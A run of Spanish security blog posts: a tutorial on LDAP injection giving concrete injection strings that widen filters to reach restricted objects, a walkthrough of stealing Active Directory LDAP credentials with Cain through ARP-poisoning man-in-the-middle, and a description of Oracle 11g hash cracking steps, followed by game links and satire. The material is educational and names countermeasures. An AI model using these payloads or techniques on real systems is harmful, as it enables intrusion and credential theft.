Como se puede apreciar un filtro siempre va entre paréntesis. Además se dispone de un conjunto muy reducido de operadores lógicos AND “&”, OR “|” y NOT “!”, los operadores relacionales <=, >=, = y ~= y el comodín * que se utiliza para sustituir por a “uno o varios caracteres”. Así pues, ejemplos de filtros válidos serían:

- (&(!(objectClass=Impresoras))(uid=s*)): En este ejemplo estaríamos buscando todos los objetos que cumplan que no son de la clase Impresoras y cuyo atributo uid tiene un valor que comienza por “s”

- (&(objectClass=user)(uid=*)): Este filtro nos devolvería la lista de todos los objetos de tipo user, tengan el valor que tengan en el atributo uid.

No serían filtros válidos aquellos que no utilicen notación prefija del operador o no utilicen un anidamiento correcto de paréntesis, como por ejemplo:

- ((objectClass=Impresoras)|(nombre=Epson*)): En este ejemplo el operador lógico OR “|” no va correctamente situado.

- ((&(objectClass=Impresora))((nombre=Epson*Color)): En este caso los paréntesis no están bien anidados.

LDAP Injection en aplicaciones Web

Las técnicas de inyección de comandos LDAP en aplicaciones web se basan en los mismos principios que las técnicas de SQL Injection. En una aplicación web el programador, en un determinado punto recoge datos enviados por el usuario que van a ser utilizados para generar una consulta LDAP. En un entorno vulnerable el programador no realiza el filtrado de los parámetros y el atacante aprovecha este fallo de seguridad para poder inyectar código y cambiar el resultado que se obtiene con el filtro.

El ejemplo de vulnerabilidad explicada por Sacha Faust en su documento muestra un entorno en el que se extrae más información mediante la unión de un filtro. Para ello supone un entorno en el que el programador va a generar un filtro simple del tipo (atributo=valor). Entendemos filtro simple como aquel que no lleva un operador. Para ello construye una consulta mediante la concatenación del valor recibido convertido a cadena de caracteres que después ejecuta.

string: filter = "(uid=" + CStr(userName) + ")"

En este entorno, el atacante podría realizar una inyección de código LDAP para acceder a más objetos saltándose las restricciones del programa original. Siguiendo con el ejemplo de Sacha Faust, éste propone que se podría realizar una inyección de la siguiente forma: (some attribute=user input)(|(cn=*)). Para construir esta inyección, utilizando el código vulnerable habría que introducir como parámetro de entrada la siguiente cadena: sfaust)(|(cn=*)

“sfaust” es la entrada de datos esperada por el programa para construir el filtro. Posteriormente, el atacante cierra el paréntesis que introduce el programador y abre un nuevo filtro con el operador lógico OR en el que se pide la devolución de todos los objetos sea cual sea su valor en cn.

Esta inyección, que Sacha Faust prueba sobre un árbol LDAP SunOne Directory Server 5.0 devuelve la suma de los resultados de los dos filtros: (uid=sfaust) y (|(cn=*)). Sin embargo, si nos ceñimos a la definición del lenguaje de creación de filtros marcada por la RFC vemos que esta consulta no es correcta pues los filtros no están siguiendo las normas de anidamiento y notación prefija. Sin embargo, sí podemos tomar la consulta como dos filtros independientes bien formados, aunque en segundo caso no sería necesario añadir el operador lógico OR. Probadas estas consultas sobre árboles ADAM y OpenLDAP vemos que NO devuelven más datos y por lo tanto este sistema de inyecciones NO puede ser utilizado con ellos.

Primeras conclusiones

Tras realizar estas pruebas podemos extraer las siguientes conclusiones:

1.- Para realizar una inyección de código LDAP en una aplicación que trabaje contra ADAM u OpenLDAP es necesario que el filtro original, es decir, el del programador tenga un operador OR o AND. A partir de este punto se pueden realizar inyecciones de código que permitan extraer información o realizar ataques Blind, es decir, a ciegas.

2.- En ese mismo entorno es necesario que la consulta generada tras la inyección esté correctamente anidada en un único par de paréntesis general o bien que el componente permita la ejecución con información que no se va a utilizar a la derecha del filtro.

“AND” LDAP Injection

En este entorno nos encontraríamos con que el programador ha creado una consulta LDAP con un operador AND y uno o los dos parámetros son solicitados al usuario y no está filtrado correctamente en servidor. En el caso de inyecciones en consultas LDAP que lleven el operador AND estamos obligados a utilizar el primer atributo algo válido, pero se pueden utilizar las inyecciones para mediatizar los resultados y por ejemplo, realizar escaladas de privilegios o acceso a otros objetos del árbol LDAP.

En este caso nos encontraríamos con una consulta del siguiente tipo:

(&(atributo1=valor1)(atributo2=valor2))
Ejemplos: Supongamos un entorno en el que se muestra la lista de todos los documentos a los que un usuario del nivel poco privilegiado tiene acceso mediante una consulta que incluye el directorio de documentos en un parámetro inyectable. Es decir, la consulta original es:

(&(directorio=nombre_directorio)(nivel_seguridad=bajo))
Un atacante podría construir una inyección del siguiente modo para poder acceder a los documentos de nivel de seguridad alto.

(&(directorio=almacen)(nivel_seguridad=alto))(|(directorio=almacen)(nivel_seguridad=bajo))
Para conseguir este resultado se habrá inyectado en el nombre del directorio la siguiente cadena: almacen)(nivel_seguridad=alto))(|(directorio=almacen

Como se puede ver, con esa inyección se han formado dos filtros correctamente formados pero los árboles ADAM y OpenLDAP devolverán sólo los resultados del primer filtro con lo que conseguiremos acceder a documentos, en este ejemplo, fuera de nuestra visibilidad incial.

“OR” LDAP Injection

En este entorno nos encontraríamos con que el programador ha creado una consulta LDAP con un operador OR y uno o los dos parámetros son solicitados al usuario:

(|(atributo1=valor1)(atributo2=valor2))
Supongamos en el ejemplo del árbol LDAP que tenemos una consulta inyectable del siguiente tipo: (|(cn=D*)(ou=Groups)) Es decir que devuelve todos los objetos cuyo valor en “cn” comience por “D” o cuyo valor en “ou” sea “Groups”. Al ejecutarla obtenemos:

Imagen: Consulta OR sin inyección
Si esta consulta sufriera una inyección de código en el primer parámetro, podríamos realizar una consulta que nos devolviera la lista de usuarios almacenados. Para ello realizamos la inyección en el primer valor de la siguiente cadena: void)(uid=*))(|(uid=*

Imagen: Lista de usuarios obtenida tras la inyección
Al formarse la consulta LDAP esta quedará construida de la siguiente forma: (|(cn=void)(uid=*))(|(uid=*)(ou=Groups)), permitiendo obtener, como se puede ver en la captura anterior la lista de todos los usuarios del árbol LDAP.

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

Capturando credenciales LDAP con CAIN Step by Step

El uso de LDAP con los sistemas de "Siguelsainon" se está extendiendo cada vez más en intranets y redes corporativas. En la versión de Cain del 29 de Julio de 2007 se añadieron, entre otras, las siguientese funcionalidades:

- Sniffer filter for LDAP passwords.
- Automatic Certificate Collector for LDAPS protocol.
- LDAPS Man-in-the-Middle Sniffer and password collector (TCP port 636).

Como es algo interesante, le pedía a Juan Luís Rambla, compañero y MVP de Windows Security, que hicera un sencillo Step By Step probando con el AD y aquí está.

Capturando credenciales LDAP con CAIN. Step by Step. Por Juan Luís Rambla

Saludos malignos!

Capturando credenciales LDAP con CAIN. Step by Step. Por Juan Luís Rambla

A través de las siguientes líneas vamos a describir como se produce el ataque de robo de credenciales de autentificación LDAP, mediante el uso de la técnica complementaria de Man in the middle. Para la realización de esta operación presentamos un escenario de LDAP basado en Directorio Activo, para lo cual contamos con un dominio llamado Informatica64.hol, al que realizaremos una conexión mediante una aplicación estándar de consulta LDAP como es LDAP Browser en su versión 2.6.

Como herramienta para la realización del ataque de hombre en medio, utilizaremos Caín & Abel 4.9.6, que cuenta con la posibilidad de realizar Sniffing de sesiones LDAP y que nos servirá para recuperar la contraseña de autentificación contra el servicio de directorio existentes para el dominio de Informatica64. Para ello durante el proceso de “Bind” del cliente contra el servidor LDAP, se interceptará todo el proceso de autentificación del usuario, con el consiguiente robo de credenciales. En esta ocasión el objetivo es el robo de credenciales del usuario “Administrator”.

Fig. 1.- Directorio Activo.
Con objeto de realizar el proceso de autentificación LDAP, procedemos a configurar la herramienta LDAP Browser, con las conexión al Controlador de dominio y las credenciales de autentificación del usuario correspondiente en formato de Nombre Distinguido (DN).

Fig. 2.- Configuración conexión cliente LDAP.

Fig. 3.- Configuración de credenciales.
Una vez realizada la configuración del cliente y proporcionado las credenciales se procede a la conexión con el servidor LDAP y que tal y como se refleja se obtiene como resultado el servicio de directorio, así como sus objetos, clases, atributos y propiedades.

Fig. 4.- Conexión LDAP.
Como hemos comprobado que la conexión se ha realizado correctamente, vamos a proceder a la interceptación y el sniffing de esta sesión LDAP. Como para la realización de cualquier otra técnica de ataque de hombre en medio, se procede a la realización del envenenamiento de la dirección física, de las dos máquinas que intervienen en el proceso (cliente y servidor LDAP) y la posterior captura de las credenciales de autentificación.

Fig. 5.- Configuración APR.
Una vez puesta en marcha la sesión de Snifing, esperamos a que se intercepte la autentificación LDAP del cliente, para a obtención de las credenciales esperadas. En este caso la autentificación interceptada, se produce al usuario ‘Administrator’, que ha utilizado como contraseña la palabra ‘admin’.

Fig. 6.- Autentificación LDAP.

Fig. 7.- Robo de credenciales LDAP.

Contramedidas: LDAP-s, IPSec para conexiones de autenticación LDAP.

15+1 Juegos Para Matar ... el Rato!

Como sabéis esta noche de miercoles y este jueves de mañana y de tarde voy a estar un poco liado, así que como no quiero olvidarme de vosotros (y tal vez me retrase en postear...) os voy a dejar, para los que no queráis intentar sacar el Reto Hacking 4 después de daros El Pistón, 15+1 juegos para matar ... el rato.

Extreme TUX Racer

El objetivo es hacer un descenso de Snow con Tux lo más chulo posible, cuidado que no se haga daño (¿o no?). Funciona en Windows Vista.


Puedes descargarlo de ExtremeTuxRacer.com

Caza al Pingüino

Ya sabes, cuantos más mates, más ganas. No os fijéis en el dramatismo de la captura dónde se ve un pingüino justo en el momento de recibir el balazo y a puntito de estallar.


Es un juego flash y puedes jugar desde esta URL: Caza al pingüino

Shoot the Penguin

Dispara al pingüino, con cariño y sin acritud, y quitalo de en medio.


Es un juego flash y puedes jugar desde esta URL: Penguin Arcade

Sumo Penguin

Ale, a darse de hostias en un combate de sumo sobre el hielo.


Es un juego flash y puedes jugar desde esta URL: Smash the Penguin

Guerra de Bazokas

En este juego, tanto si ganas como si pierdes, mueren pingüinos. Solo tienes que lanzar bazookas contra el enemigo.


Es un juego flash y puedes jugar desde esta URL: Conquista de la Antártida

Aterriza al pingüino

Como si fuera un simulador de aviones tienes que aterrizar suavemente al pingüino sobre la plataforma, si te equivocas... El pooooobre pingüino explota. Se me da de mal este juego...


Es un juego flash y puedes jugar desde esta URL: Conquista de la Antártida

Mata a los pingüinos paracaidistas

Tú tienes tu sitio y otra distro quiere quitártelo, no les dejes, antes de que se instalen en tu hardware ¡mátalos!


Es un juego flash y puedes jugar desde esta URL: Mata Paracas

Los YetiSports

Los siguientes juegos puedes descargarlos de la web del creador: YetiSports.com

Yeti Sports 1: Smash the Penguin

Mándale a freir gárgaras. Solo tienes que atinar y mandarlo lo más lejos posible. Con cariño y sin acritud.


Es un juego flash y puedes jugar desde esta URL: Smash the Penguin

Yeti Sports 1 (Gore Version): Kill the Penguin

Mándale a la porra, pero hazle cachitos, arráncale la cabeza, que se clave pinchos y explote con bombas. Esta es la versión para los más "amigos".


Es un juego flash y puedes jugar desde esta URL: Kill the Penguin

Yeti Sports 2: Clava al Pingüino

La idea es pegarle con una bola al pingüino y clavarle en la diana. Muy útil para rebajar nivel de estress.


Es un juego flash y puedes jugar online en esta URL: Dart the Penguin

Yeti Sports 3: Lanza el pingüino

El objetivo es que suba lo más alto para que la hostia sea buena.


Es un juego Flash y puedes jugar desde esta URL: Throw the Penguin

Yeti Sports 4: Que se pire el pingüino

Agarra el pingüino y daselo a algún bicho para que se lo lleve lo más lejos posible.


Es un juego Flash y puedes jugar desde esta URL: Pingüino Viajero

Yeti Sports 5: Golf Penguin

Ale, sientete como el Tiger Woods, con un pingüino como bola. Cuidado con los animales, no vayas a hacerles daño. Al pingüino sí que puedes hacerselo.


Es un juego Flash y puedes jugar desde esta URL: Golf con Pingüino

Yeti Sports 6: Surf the penguin

Clava tu tabla de Surf a esos molestos pingüinos que te molestan en tu ola. Pesaos.


Es un juego flash y puedes jugar desde esta URL: Kill the Penguin

Yeti Sports 7: Snow the penguin

Coge tu excalibur y cablaga por la montaña, machaca a todo pingüino pesado que se meta en tu camino. Sin piedad.


Es un juego flash y puedes jugar desde esta URL: Kill the Penguin

Yeti Sports 8: En la selva

Este no es de los que más me entretengan, no se matan muchos pingüinos que digamos. Pero en fin, ya que es el último de los Yeti Sports habrá que ponerlo.


Es un juego flash y puedes jugar desde esta URL: Yeti en la Selva

Ale, a matar... el rato. Saludos Malignos!

El Pistón

El eventazo se acerca y allí, entre amiguetes vamos a resolver en directo varios de los Retos Hacking de aquí. Dani Kachakil y Pedro laguna van a utilizar las arquitecturas del Reto Hacking 1 en las demos, RoMaNSoFt se ha currado una ppt resolviendo el Reto Hacking 3 preciosa y yo voy a resolver el Reto Hacking 4, así que, antes de publicar todos los solucionarios de dicho Reto Hacking 4 os voy a dar El Pistón, para que lo intentéis antes de que salga la solución:

Fase 1:

- Impresoras en Primera Planta = 3
- Terminales en Primera Planta = 3
- Asteriscos en Primera Planta = 6
- Impresoras en Segunda Planta = 1
- Terminales en Segunda Planta = 2
- Asteriscos en Segunda Planta = 3
- Impresoras en Tercera Planta = 2
- Terminales en Tercera Planta = 1
- Asteriscos en Tercera Planta = 3
- Impresoras en Asteriscos = 6
- Terminales en Asteriscos = 6
- Asteriscos en Asteriscos = 12

Pregunta: ¿Para que sirve el Asterisco?
Respuesta: RFC 4515

Lightweight Directory Access Protocol (LDAP):
String Representation of Search Filters


Fase 2

Respuesta

Saludos Malignos!

Oracle 11g algoritmo del hash

En la versión 11g Oracle está mejorando el sistema de gestión de la contraseña de los usuarios que ya fue atacado hasta el extremo de aparecer en programas como CAIN que incorporan un crackeador para los hashes de Oracle. En este post os dejé linkados los documentos dónde lo explicaban con mucho cariño “La clave del oráculo”.

Imagen: Cain cracker. Passwords de Oracle
Con la aparición de las primeras versiones de Oracle 11g se han puesto manos a la obra y ya tienen el algoritmo para generar el hash. Para evitar que dos usuarios con la misma password tengan el mismo valor en hash Oracle ha añadido el uso de los sistemas de salting. Esto también prevendría el famoso problema de tener el usuario "mali" con contraseña "gno" y un usuario "mal" con contraseña "igno" que generaban el mismo hash.

Toda la información del usuario se almacena en la tabla sys.user$ dónde solo tienen acceso los administradores del sistema. En esa tabla aparte de mantener para cada usuario el campo Password con el hash calculad como se hace en la versión Oracle 10g por compatibilidad hay una serie de columnas que almacenan hashes. Una de ellas es Spare4 dónde se almacena un valor que comienza por S: y continúa con un hash de 240 bits. Bien, ahí se almacena un derivado de la contraseña que puede ser calculado como:

Spare4 = SHA1(contraseña+salt)+salt

Es decir, del carácter 3 al 42 de Spare4 está el SHA1 de la contraseña más la cadena de salting y del 43 al 62 está la cadena de salting. Hacer un programa que rompa por fuerza bruta las contraseñas de Oracle a partir del hash consistiría en los siguientes pasos:

1.- Obtener el hash
2.- Sacar el valor del Salting de los últimos bits
3.- Generar un posible_pass
4.- Concaternar posible_pass con salting y generar SHA1 de esta cadena.
5.- Sumar SHA1 generado con Salt
6.- Comprobar si el resultado obtenido es igual al hash.

La primera cuestión que todo el mundo se plantea es: se sigue guardando el hash antiguo, así que parece que el problema va a ser como el de los hashes NTLM en Windows y la segunda cuestión, ¿por qué no se ha usado SHA2 para la versión 11g?

En esta URL tenéis un ejemplo de código en PL/SQL para “testear” las passwords en Oracle 11g.

"Oracle 11g Password algorithm revealed"

Saludos Malignos!

La prueba del 9

Ha terminado Septiembre y podemos ver como van los resultados en el mantenimiento del servicio web. Es la prueba del 9 para el CPD de la organización, para saber quien hace los deberes y quién no los hace...bien del todo. Todos los datos están sacados de Pingdom y he cogido una lista de empresas que se dedican a esto de la tecnología. Además he añadido la columna de % de Uptime para ver "cuantos nueves" llevan de uptime.

Ubuntu sigue en cabeza, y es que el día de descanso del CPD que lleva le permite vivir en esa posición holgadamente. Sun y Toshiba están camido de descansar un día extra para finales de este año también. Y los CPDs que menos han descansado: Google y Spectra.


Nota: Todos los cálculos los he hecho a mano porque ya sabéis todos que Excel no sabe operar bien.

Todos somos Spectra

Ahora que ya sabemos que Spectra se hunde tras el fallo de Excel 2007 que va a acabar en más desastres que el efecto del año 2000, según dicen tanto “los expertos” en mercado como "los técnicoless", hemos de mover nuestros intereses hacia ganar más fondos para poder seguir la línea de investigación científica que termina en el control mental de la población. Para ganar esa pasta hemos de otear nuevas áreas de extracción de pasta.

De hecho, se ha comprobado que sí, que Spectra se hunde, por eso los evangelistas de la misma han tenido que utilizar unos ingeniosos artilugios dignos de la más malvada mente criminal para evitar el hundimiento. El artilugio ha sido llamado “Spectra-flotadores” (ya lo tenemos patentado para que el que lo implemente tenga que pagar rollaties uhahahaua!). En las fotos vemos a David Cervigón probando el ingenio y al padre parada ejercitando los complicados movimientos para su manejo, dignos del más hábil de los agentes.

El "abuelo" evangelista, practicando los movimientos del Spectra-flotador
Cervi, el evangelista de Spectra, usando el Spectra-flotador
Son momentos difíciles, pero no dudéis de Spectra compañeros, ya en sus orígenes el primer Macintosh llevaba software de la compañía maligna y hoy en día se instala Spectra Office y Spectra IE en los Mac y podéis comprobar cómo a principios de este año “El Líder” y Steve Jobs charlaban sobre esto e incluso le caía simpatico el PC-guy de la campaña I´m Mac/I´m a PC al gran Jobs; el primer PC de IBM llevaba también el software del mal y hoy en día muchos de los servers IBM corren con Spectra Windows Server, ahora los esbirros de Sun también venden instalado Spectra Windows Server de 64 bits y mediante el acuerdo con Novell se logra ganar pasta con Linux.

Hay que recordar que aunque para muchos pueda parecer el resurgimiento de MAC, Linux o SUN todo es una estrategia concebida por las científicos geneticamente-mutados más malvados de la organización, que desde el triste momento aquel en que Spectra casi es divida por no tener competidores tuvieron que urdir esta estratagema para que parezca que hay más competidores cuando realmente Todos Somos Spectra.

El acuerdo firmado entre Novell y Spectra ha hecho que los ingresos por el negocio de SUSE suban un 243 % lo que indica que Spectra ha ganado más pasta con Linux de la que muchas empresas del Software “mal llamado” Libre han visto junta. (cuñaaaoooo!!).

Los caminos de Spectra son inescrutables pero “El Líder” dirigirá la secta del mal entre la niebla para llegar a la dominación mundial, porque TODOS SOMOS SPECTRA.

PD: bueno,... todos somos Spectra menos Google, que de momento da mucha guerra y habrá que ver como controlarlo ;)